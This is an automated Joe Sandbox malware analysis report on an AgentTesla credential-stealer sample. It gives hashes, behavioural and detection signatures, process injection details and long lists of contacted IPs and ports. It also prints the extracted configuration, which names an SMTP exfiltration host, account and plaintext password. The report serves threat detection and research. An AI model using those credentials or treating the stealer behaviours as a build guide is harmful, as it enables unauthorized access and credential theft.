Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
n1KVzXM8Wk.exe

Overview

General Information

Sample name:n1KVzXM8Wk.exe
Analysis ID:1397531
MD5:72b14801621eb5aaee0715dfc65d8b72
SHA1:2f4b2859fa8d1db18bc639622dddc5025af07c60
SHA256:49022d920d3b36c58eba1f941352a936a71aaac99cdacf65a925e0dc655bd232
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
Connects to many IPs within the same subnet mask (likely port scanning)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Outbound RDP Connections Over Non-Standard Tools
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Suspicious Outbound Kerberos Connection
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Connects to several IPs in different countries
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Sigma detected: Suspicious Outbound SMTP Connections
Tries to load missing DLLs
Uses SMTP (mail sending)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • n1KVzXM8Wk.exe (PID: 6812 cmdline: C:\Users\user\Desktop\n1KVzXM8Wk.exe MD5: 72B14801621EB5AAEE0715DFC65D8B72)
    • InstallUtil.exe (PID: 20140 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.bananasnevis.com", "Username": "info@bananasnevis.com", "Password": "4RJak3wc7b^o"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2959651140.000000000333E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000005.00000002.2959651140.00000000032F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2959651140.00000000032F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.2081033615.0000011995209000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          00000000.00000002.2295238294.00000119A408F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 12 entries
            SourceRuleDescriptionAuthorStrings
            0.2.n1KVzXM8Wk.exe.119a41201a0.1.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.n1KVzXM8Wk.exe.119a41201a0.1.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0.2.n1KVzXM8Wk.exe.119a41201a0.1.raw.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x334e3:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x33555:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x335df:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x33671:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x336db:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x3374d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x337e3:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x33873:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                0.2.n1KVzXM8Wk.exe.119a41201a0.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0.2.n1KVzXM8Wk.exe.119a41201a0.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 13 entries

                    System Summary

                    barindex
                    Source: Network ConnectionAuthor: Markus Neis: Data: DestinationIp: 45.67.210.47, DestinationIsIpv6: false, DestinationPort: 3389, EventID: 3, Image: C:\Users\user\Desktop\n1KVzXM8Wk.exe, Initiated: true, ProcessId: 6812, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 50907
                    Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 201.20.80.113, DestinationIsIpv6: false, DestinationPort: 666, EventID: 3, Image: C:\Users\user\Desktop\n1KVzXM8Wk.exe, Initiated: true, ProcessId: 6812, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 50150
                    Source: Network ConnectionAuthor: Ilyas Ochkov, oscd.community: Data: DestinationIp: 47.93.114.68, DestinationIsIpv6: false, DestinationPort: 88, EventID: 3, Image: C:\Users\user\Desktop\n1KVzXM8Wk.exe, Initiated: true, ProcessId: 6812, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 53926
                    Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 103.124.198.118, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\n1KVzXM8Wk.exe, Initiated: true, ProcessId: 6812, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49745
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 103.133.223.211, DestinationIsIpv6: false, DestinationPort: 2525, EventID: 3, Image: C:\Users\user\Desktop\n1KVzXM8Wk.exe, Initiated: true, ProcessId: 6812, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 50344
                    No Snort rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: http://192.140.42.83:31511Avira URL Cloud: Label: malware
                    Source: 5.2.InstallUtil.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.bananasnevis.com", "Username": "info@bananasnevis.com", "Password": "4RJak3wc7b^o"}
                    Source: heygirlisheeverythingyouwantedinaman.comVirustotal: Detection: 20%Perma Link
                    Source: http://188.164.193.178:30744Virustotal: Detection: 10%Perma Link
                    Source: n1KVzXM8Wk.exeReversingLabs: Detection: 21%
                    Source: n1KVzXM8Wk.exeVirustotal: Detection: 23%Perma Link
                    Source: n1KVzXM8Wk.exeJoe Sandbox ML: detected

                    Exploits

                    barindex
                    Source: Yara matchFile source: 00000000.00000002.2081033615.0000011995209000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: n1KVzXM8Wk.exe PID: 6812, type: MEMORYSTR
                    Source: unknownHTTPS traffic detected: 140.82.114.3:443 -> 192.168.2.4:49731 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.190.93:443 -> 192.168.2.4:51515 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 102.223.20.217:443 -> 192.168.2.4:54575 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.190.93:443 -> 192.168.2.4:55000 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.4:55558 version: TLS 1.2
                    Source: n1KVzXM8Wk.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    barindex
                    Source: global trafficTCP traffic: Count: 11 IPs: 212.110.188.222,212.110.188.189,212.110.188.202,212.110.188.213,212.110.188.198,212.110.188.220,212.110.188.193,212.110.188.195,212.110.188.204,212.110.188.216,212.110.188.207
                    Source: global trafficTCP traffic: Count: 15 IPs: 188.132.222.171,188.132.222.168,188.132.222.8,188.132.222.199,188.132.222.166,188.132.222.167,188.132.222.52,188.132.222.44,188.132.222.6,188.132.222.5,188.132.222.70,188.132.222.39,188.132.222.38,188.132.222.34,188.132.222.14
                    Source: global trafficTCP traffic: Count: 10 IPs: 184.178.172.13,184.178.172.23,184.178.172.26,184.178.172.25,184.178.172.14,184.178.172.28,184.178.172.17,184.178.172.5,184.178.172.18,184.178.172.11
                    Source: global trafficTCP traffic: 13.234.24.116 ports 1080,1,2,3,3128,8
                    Source: global trafficTCP traffic: 103.149.194.11 ports 0,2,3,32650,5,6
                    Source: global trafficTCP traffic: 162.215.212.160 ports 62691,64696,3,5,8,9,38958
                    Source: global trafficTCP traffic: 188.164.193.178 ports 45775,7001,9733,63078,15342,8500,3,30663,8,47573,60484,37842,5348,33338,35626,30744
                    Source: global trafficTCP traffic: 109.123.254.43 ports 17179,23901,42048,14474,18072,40667,36076,0,1,31167,2,51584,5,51025,24210,51856,51538
                    Source: global trafficTCP traffic: 207.180.234.220 ports 47348,45876,48963,39323,42823,36946,2,39919,3,4,8,49586,30507,37736
                    Source: global trafficTCP traffic: 212.3.112.128 ports 0,3,5,6,35860,8
                    Source: global trafficTCP traffic: 92.246.139.113 ports 0,1,2,34985,13209,30311,32244,13940,11201,10003,30635
                    Source: global trafficTCP traffic: 92.246.139.112 ports 1,11945,4,5,9,30504
                    Source: global trafficTCP traffic: 212.115.232.79 ports 31280,0,1,2,3,8
                    Source: global trafficTCP traffic: 162.144.32.209 ports 23847,2,3,4,7,8
                    Source: global trafficTCP traffic: 103.82.233.2 ports 53281,1,2,3,5,8
                    Source: global trafficTCP traffic: 92.204.135.4 ports 44712,1,2,4,58754,7
                    Source: global trafficTCP traffic: 157.185.161.100 ports 26589,2,5,6,8,9
                    Source: global trafficTCP traffic: 51.38.14.161 ports 23306,28918,0,2,3,33893,6
                    Source: global trafficTCP traffic: 92.205.110.47 ports 17158,50709,0,2,5,8,50228,55509
                    Source: global trafficTCP traffic: 132.148.128.8 ports 18401,61496,2254,48181,1,2,5,12519,1783,9
                    Source: global trafficTCP traffic: 194.31.79.75 ports 1,2,29671,6,7,9
                    Source: global trafficTCP traffic: 41.223.234.116 ports 2,3,5,7,9,37259
                    Source: global trafficTCP traffic: 102.64.116.1 ports 0,2,32850,3,5,8
                    Source: global trafficTCP traffic: 175.139.179.65 ports 0,2,4,5,8,42580
                    Source: global trafficTCP traffic: 161.97.147.193 ports 43131,29901,55283,1,1599,5,37257,9,2838
                    Source: global trafficTCP traffic: 41.217.223.145 ports 0,2,3,32650,5,6
                    Source: global trafficTCP traffic: 198.57.195.42 ports 38242,1,3,6,31683,8,17986
                    Source: global trafficTCP traffic: 72.10.160.90 ports 13083,22693,29129,3913,15607,2589,1335,1257,19809,24199,30967,3897,14761,33087,23277,25997,25659,20007,30893,2,5,1463,8,9,17337,16703
                    Source: global trafficTCP traffic: 72.10.160.93 ports 25873,0,1,3,6,7,16703
                    Source: global trafficTCP traffic: 72.10.160.92 ports 0,2,19809,26077,6,7,10275
                    Source: global trafficTCP traffic: 207.180.222.186 ports 56962,2,5,6,9,16207
                    Source: global trafficTCP traffic: 152.228.134.212 ports 32148,1,2,3,4,8
                    Source: global trafficTCP traffic: 72.10.160.170 ports 18543,5385,2085,1,1611,2643,2565,6,28003,29053
                    Source: global trafficTCP traffic: 72.10.160.172 ports 15991,17293,27559,2955,2,5,9,1969
                    Source: global trafficTCP traffic: 72.10.160.171 ports 30189,2,6,7,6227,5369,1969,5009,6607
                    Source: global trafficTCP traffic: 173.249.33.122 ports 47537,62690,5640,27427,16708,2,3,3216,4,8,49851,9,44194,45241,49382
                    Source: global trafficTCP traffic: 51.222.241.157 ports 22538,27206,0,2,6,7,2563,46286
                    Source: global trafficTCP traffic: 128.199.221.91 ports 8004,64579,33383,29603,26789,1,2,5,9,12259
                    Source: global trafficTCP traffic: 161.97.173.42 ports 46018,0,53397,2,3,6,23670,7,37862,31579,27172
                    Source: global trafficTCP traffic: 207.180.226.58 ports 54690,64608,59932,2,3,51276,5,9
                    Source: global trafficTCP traffic: 154.79.254.236 ports 0,2,3,32650,5,6
                    Source: global trafficTCP traffic: 107.180.88.41 ports 37881,1,3,7,8,3734
                    Source: global trafficTCP traffic: 148.72.212.252 ports 44920,0,1,4,5,50415
                    Source: global trafficTCP traffic: 5.135.137.13 ports 59124,1,2,4,5,9
                    Source: global trafficTCP traffic: 132.148.154.97 ports 0,1,10958,5,59369,8,9
                    Source: global trafficTCP traffic: 113.53.29.228 ports 1,13629,2,3,6,9
                    Source: global trafficTCP traffic: 146.190.84.209 ports 9445,62842,33091,4,5,26154,9
                    Source: global trafficTCP traffic: 51.15.205.223 ports 1,3,6,7,9,16379
                    Source: global trafficTCP traffic: 145.239.2.102 ports 14075,15460,42147,48821,28501,0,1,56732,4,59522,5,6,29631,13247,62181,3769
                    Source: global trafficTCP traffic: 162.214.102.121 ports 21412,24505,64557,0,29376,29430,2,3,4,59334,31540,52420,9,51356
                    Source: global trafficTCP traffic: 91.203.114.71 ports 0,38838,2,4,42905,5,9
                    Source: global trafficTCP traffic: 5.161.98.204 ports 22019,44739,58199,3240,0,1,3,7,9,37901,53935
                    Source: global trafficTCP traffic: 185.51.92.103 ports 1,2,3,5,7,51327
                    Source: global trafficTCP traffic: 51.222.241.8 ports 29877,0,55452,5,6,50565,36411
                    Source: global trafficTCP traffic: 41.217.220.214 ports 0,2,3,32650,5,6
                    Source: global trafficTCP traffic: 213.136.75.85 ports 59058,0,5,8,9,50238
                    Source: global trafficTCP traffic: 51.15.241.5 ports 1,3,6,7,9,16379
                    Source: global trafficTCP traffic: 94.23.83.53 ports 44334,8960,64305,41537,1,64817,4,54028,6,7,8,31633
                    Source: global trafficTCP traffic: 51.81.186.179 ports 0,3,5,58630,6,8,51405
                    Source: global trafficTCP traffic: 51.75.125.208 ports 15084,41649,18080,62727,1,33356,4,6,55895,54879,30802,9
                    Source: global trafficTCP traffic: 167.71.5.83 ports 8080,1,2,3,3128,8
                    Source: global trafficTCP traffic: 173.212.240.168 ports 20341,39180,0,1,58854,3,8,9
                    Source: global trafficTCP traffic: 51.210.4.123 ports 61802,2,56238,3,58653,5,6,55774,8,57969
                    Source: global trafficTCP traffic: 183.78.143.142 ports 1,2,3,4,28134,8
                    Source: global trafficTCP traffic: 148.66.130.53 ports 0,1,2,5,47011,12005
                    Source: global trafficTCP traffic: 160.19.155.51 ports 8080,5,6,7,8,5678
                    Source: global trafficTCP traffic: 92.205.28.187 ports 26439,2,3,4,6,9
                    Source: global trafficTCP traffic: 95.165.163.188 ports 36496,0,1,3,60103,6
                    Source: global trafficTCP traffic: 34.64.104.210 ports 1,2,3,5,8,53128
                    Source: global trafficTCP traffic: 50.63.12.33 ports 9367,0,1,40838,34644,50781,5,23065,7,22450,8,58507,52814,30920
                    Source: global trafficTCP traffic: 5.196.111.30 ports 0,1,2,4,8,20481
                    Source: global trafficTCP traffic: 141.94.174.6 ports 45877,4098,39796,59583,2450,35072,35557,50470,1772,60870,7856,37876,40280,38428,13326,41388,45620,41866,41920,3096,60912,0,1,33466,3,3601,24085,33346,6,13718,6438,2935,1647
                    Source: global trafficTCP traffic: 166.62.87.148 ports 40591,42801,0,1,2,4,8
                    Source: global trafficTCP traffic: 51.89.173.40 ports 3100,44719,23313,23854,20435,1,30199,2,3,55198,51511,11058
                    Source: global trafficTCP traffic: 50.63.13.3 ports 6164,12539,1,34677,3,53005,6,7,12035,44392,4214,11673
                    Source: global trafficTCP traffic: 79.137.204.235 ports 1,2,3,7,30225,13722
                    Source: global trafficTCP traffic: 94.232.11.178 ports 46449,0,2,5,58028,8
                    Source: global trafficTCP traffic: 161.97.160.158 ports 13197,27010,58943,1,4,5,8,13970,5814,11018
                    Source: global trafficTCP traffic: 51.210.45.148 ports 8772,19873,62283,41855,60359,3,5,6,59612,8,11176,36721,36424,3865
                    Source: global trafficTCP traffic: 149.28.141.180 ports 65201,0,1,2,5,6
                    Source: global trafficTCP traffic: 37.187.143.172 ports 47016,0,1,4,6,7
                    Source: global trafficTCP traffic: 163.172.149.133 ports 1,3,6,7,9,16379
                    Source: global trafficTCP traffic: 159.223.71.71 ports 50837,49922,62572,59243,56581,2,4,59159,53741,51187,9,64193,51935,64151,51616
                    Source: global trafficTCP traffic: 147.45.43.59 ports 33468,3,34555,4,6,8,30886
                    Source: global trafficTCP traffic: 66.228.33.190 ports 2,4,6,29466,48487,9,36702
                    Source: global trafficTCP traffic: 162.241.66.135 ports 64367,42875,2,4,5,7,8
                    Source: global trafficTCP traffic: 41.217.220.69 ports 0,2,3,32650,5,6
                    Source: global trafficTCP traffic: 20.205.61.143 ports 8123,1,2,3,8,80
                    Source: global trafficTCP traffic: 125.229.149.168 ports 65110,65100,0,1,5,6
                    Source: global trafficTCP traffic: 198.12.253.1 ports 49878,0,2,3,8,3820,50205
                    Source: global trafficTCP traffic: 185.171.24.5 ports 18675,6378,29527,1,5,6,7,8
                    Source: global trafficTCP traffic: 91.121.89.41 ports 8080,1,2,3,3128,8
                    Source: global trafficTCP traffic: 138.197.92.110 ports 21346,1,2,3,4,6
                    Source: global trafficTCP traffic: 166.62.88.163 ports 30178,51350,4,5,54445,1992,16139
                    Source: global trafficTCP traffic: 103.121.89.75 ports 39267,2,3,6,7,9
                    Source: global trafficTCP traffic: 203.110.145.82 ports 63128,1,2,3,6,8
                    Source: global trafficTCP traffic: 162.241.46.40 ports 62592,62244,49401,60708,56241,61579,0,1,4,9,46097
                    Source: global trafficTCP traffic: 203.161.32.218 ports 59220,0,2,3,5,9,52903
                    Source: global trafficTCP traffic: 46.182.6.69 ports 41041,63049,0,1,25295,4
                    Source: global trafficTCP traffic: 45.117.179.179 ports 14791,33164,3547,3,4,5,7,28151,18701,55606
                    Source: global trafficTCP traffic: 203.161.32.242 ports 0,2,3,5,9,52903
                    Source: global trafficTCP traffic: 138.68.24.185 ports 46035,0,3,59307,4,5,6
                    Source: global trafficTCP traffic: 200.6.175.10 ports 59341,1,3,4,5,9
                    Source: global trafficTCP traffic: 129.146.45.163 ports 31289,1,2,3,8,9
                    Source: global trafficTCP traffic: 103.121.90.216 ports 6422,44419,8680,0,6,8,6546,15229
                    Source: global trafficTCP traffic: 103.230.126.123 ports 48359,44341,46497,57821,3,4,60511,5,8,9
                    Source: global trafficTCP traffic: 167.172.159.43 ports 48983,0,1,3,5,6,60153,32988,13988
                    Source: global trafficTCP traffic: 72.167.221.145 ports 53672,2,3,5,6,7,3824
                    Source: global trafficTCP traffic: 138.68.60.8 ports 8080,1,2,3,3128,8
                    Source: global trafficTCP traffic: 162.240.19.133 ports 38673,1,2,5,6,51226,42690
                    Source: global trafficTCP traffic: 103.78.0.44 ports 1,2,3129,3,3128,9
                    Source: global trafficTCP traffic: 107.180.101.18 ports 21643,3,27053,33302,59368,6,26850,3663,37411,5855
                    Source: global trafficTCP traffic: 109.205.181.27 ports 48977,7663,58981,0,3,4,5,25783,50344,15737,2419
                    Source: global trafficTCP traffic: 186.97.172.178 ports 60080,5,6,7,8,5678
                    Source: global trafficTCP traffic: 216.10.242.18 ports 40571,31586,3,5,7,9,9735
                    Source: global trafficTCP traffic: 104.238.111.107 ports 5484,15073,21453,5452,45883,3230,23667,0,56225,2,30026,3,15419,60214,36049,6,8968,7757,7999,53777
                    Source: global trafficTCP traffic: 49.13.116.170 ports 0,1,2,3,6,31602
                    Source: global trafficTCP traffic: 43.255.113.232 ports 8083,8086,2,8,80,82,84
                    Source: global trafficTCP traffic: 103.176.116.171 ports 0,2,3,32650,5,6
                    Source: global trafficTCP traffic: 161.97.170.209 ports 24606,2296,61841,43129,0,2,4,6
                    Source: global trafficTCP traffic: 65.49.82.7 ports 40202,0,4,6,7,46770,31977
                    Source: global trafficTCP traffic: 51.158.105.107 ports 1,3,6,7,9,16379
                    Source: global trafficTCP traffic: 107.180.89.55 ports 25508,0,2,5,8,12940
                    Source: global trafficTCP traffic: 162.240.10.35 ports 37761,35087,0,4,5,6,7,47056
                    Source: global trafficTCP traffic: 185.45.194.176 ports 29537,2,3,5,7,9
                    Source: global trafficTCP traffic: 115.144.163.198 ports 20986,0,2,6,8,9
                    Source: global trafficTCP traffic: 139.99.9.218 ports 3891,17253,17182,42325,28639,9141,1,54386,2,52151,29346,7,8,18209,32616,17248,17438
                    Source: global trafficTCP traffic: 194.233.78.142 ports 42420,49628,39067,46115,39852,36431,35760,34471,42369,41119,1,31893,3,4,30295,31681,7,33551,35906,39833
                    Source: global trafficTCP traffic: 167.99.123.158 ports 59431,27237,1,3,4,5,9,60880,34913
                    Source: global trafficTCP traffic: 41.174.96.38 ports 0,2,3,32650,5,6
                    Source: global trafficTCP traffic: 51.15.254.129 ports 1,3,6,7,9,16379
                    Source: global trafficTCP traffic: 162.144.36.208 ports 27829,38242,2,3,4,27531,8,52517
                    Source: global trafficTCP traffic: 139.59.149.137 ports 22055,38062,1,3,4,6,8,36841
                    Source: global trafficTCP traffic: 72.167.220.46 ports 15077,1,5,7,8,13046,15758
                    Source: global trafficTCP traffic: 166.62.53.45 ports 2,51350,5,6,1992,56862,8,60186
                    Source: global trafficTCP traffic: 109.238.12.156 ports 46962,17254,29834,1163,61743,27241,2,3,4,26770,22472,8,9,55724
                    Source: global trafficTCP traffic: 132.148.245.169 ports 49824,38780,1,3,36149,7,8,38117
                    Source: global trafficTCP traffic: 162.210.192.135 ports 1,35129,4,6,60684,8,9,16489
                    Source: global trafficTCP traffic: 188.165.252.198 ports 14084,0,1,3469,4,8
                    Source: global trafficTCP traffic: 41.65.236.37 ports 1976,1,6,1981,7,9
                    Source: global trafficTCP traffic: 67.43.227.228 ports 27917,5495,16147,19331,14299,9039,24971,22035,7071,20779,25329,25527,8063,3017,5,6,30583,7,12487,9,5769,1759
                    Source: global trafficTCP traffic: 67.43.227.227 ports 9245,15261,5343,6533,26337,27869,22599,25329,15629,25341,3017,4929,1575,10011,7679,6347,1759,15527,1119,18963,6169,23475,1,2,2355,9,4479,12129
                    Source: global trafficTCP traffic: 51.79.87.144 ports 41230,41746,0,30464,3,54395,4,6,18636
                    Source: global trafficTCP traffic: 107.148.99.107 ports 58394,3,4,5,8,9
                    Source: global trafficTCP traffic: 67.43.228.254 ports 1,2,3,32221,11947,1487
                    Source: global trafficTCP traffic: 67.43.228.253 ports 8531,13083,18287,2011,7491,22105,30783,1,14869,3,4,24571,1487,26597,14313,4885,12711,29051
                    Source: global trafficTCP traffic: 67.43.228.250 ports 18345,18681,24009,1,2017,32441,6,8,14215
                    Source: global trafficTCP traffic: 164.92.237.188 ports 63722,0,2,3,5,6,55588,52306
                    Source: global trafficTCP traffic: 107.180.101.226 ports 0,1,5,23031,59810,55873,8,9,51526
                    Source: global trafficTCP traffic: 198.12.253.117 ports 13270,4971,60406,0,30794,27055,4,6,32229
                    Source: global trafficTCP traffic: 103.162.31.91 ports 2,3,41809,8,9,33829
                    Source: global trafficTCP traffic: 117.160.250.163 ports 8080,8081,9990,0,1,8,80,81,9999,82,8828
                    Source: global trafficTCP traffic: 51.75.126.150 ports 22935,36694,64615,2,3,5,9,41271
                    Source: global trafficTCP traffic: 162.215.223.76 ports 62691,62197,1,2,6,9,54623
                    Source: global trafficTCP traffic: 162.243.55.12 ports 59179,1,5,7,9,50941
                    Source: global trafficTCP traffic: 186.215.87.194 ports 6001,6000,8892,6025,6014,6002,6027,0,2,30003,5,6
                    Source: global trafficTCP traffic: 132.148.129.254 ports 41026,45366,18361,63418,3,4,5,6,60781
                    Source: global trafficTCP traffic: 188.164.196.30 ports 49426,62564,2,51284,4,6,51211,52359,9
                    Source: global trafficTCP traffic: 188.164.196.31 ports 62105,0,1,2,5,6
                    Source: global trafficTCP traffic: 67.43.236.18 ports 5089,26755,22645,0,5,8,9
                    Source: global trafficTCP traffic: 67.43.236.19 ports 5385,3,5,8,32407,10587
                    Source: global trafficTCP traffic: 67.43.236.20 ports 9321,8353,21167,14033,7621,18171,8171,21109,23985,6095,28099,22093,9919,2941,3817,27003,27565,23241,10739,5039,7815,32703,5737,15427,21039,19059,6441,27415,20627,27577,0,25053,1885,33167,5,6,3201,4873,9,10981,14647,7969,26083,14745,10005
                    Source: global trafficTCP traffic: 8.213.137.155 ports 8034,8037,3,4,543,9090,5,8888
                    Source: global trafficTCP traffic: 164.92.85.180 ports 23971,1,2,3,7,37587,9,36655
                    Source: global trafficTCP traffic: 185.23.118.103 ports 60429,0,54244,2,4,6,9
                    Source: global trafficTCP traffic: 72.10.164.178 ports 2191,25905,4893,17001,27645,1139,15827,31075,1179,10175,13201,30227,21633,3373,24303,0,32115,1,2,3,23491,23571,7129,18627,30419,31623,6331,7345,26533,28435,3021,32861,3217,25085,14917,2929,13465,20191,8509,8601,29217,18085,32093,21415,10801,26143,12707,8635,10441,30557
                    Source: global trafficTCP traffic: 171.244.140.160 ports 23867,42456,36670,44233,42968,56076,36273,2,60249,3,6,53882,7,37400,30526,9537,53749,17525
                    Source: global trafficTCP traffic: 167.86.69.142 ports 47537,46411,49369,35196,46859,4,5,6,8,9,32947
                    Source: global trafficTCP traffic: 193.41.88.58 ports 53281,1,2,3,5,8
                    Source: global trafficTCP traffic: 162.0.220.222 ports 8776,64731,11919,53242,1,3,4,6,7
                    Source: global trafficTCP traffic: 91.134.140.160 ports 20896,16487,48962,49687,57320,27207,9141,0,32896,32588,2,11946,6,8,8879,9
                    Source: global trafficTCP traffic: 185.129.250.183 ports 14462,32284,26777,2,6,7
                    Source: global trafficTCP traffic: 160.153.245.187 ports 5784,42879,2287,3,4,5,6,5436
                    Source: global trafficTCP traffic: 104.248.151.220 ports 60915,63648,0,1,53177,51040,4,5,59755
                    Source: global trafficTCP traffic: 209.216.90.208 ports 37683,20308,31470,1,2,12922,9,13203,52401
                    Source: global trafficTCP traffic: 208.87.131.151 ports 9862,26939,20971,64693,4682,49314,44288,25369,20754,1,3,4,57951,51016,9,37977
                    Source: global trafficTCP traffic: 208.109.13.93 ports 27877,5190,22401,0,1,5,9,34308
                    Source: global trafficTCP traffic: 201.76.125.147 ports 0,1,2,3,8,20183
                    Source: global trafficTCP traffic: 41.65.55.2 ports 1976,1,6,1981,7,9
                    Source: global trafficTCP traffic: 8.213.128.90 ports 8089,20002,8001,5001,3,443,4,444,8090
                    Source: global trafficTCP traffic: 23.95.216.90 ports 15673,1,3,5,6,7
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 6047
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 5436
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 58394
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 10417
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 4145
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 3601
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 49922
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 11673
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 5678
                    Source: unknownNetwork traffic detected: HTTP traffic on port 10417 -> 49790
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 6120
                    Source: unknownNetwork traffic detected: HTTP traffic on port 6047 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 6764
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 8888
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 32770
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 3128
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 12519
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 5436
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 1080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 51778
                    Source: unknownNetwork traffic detected: HTTP traffic on port 1080 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 10471
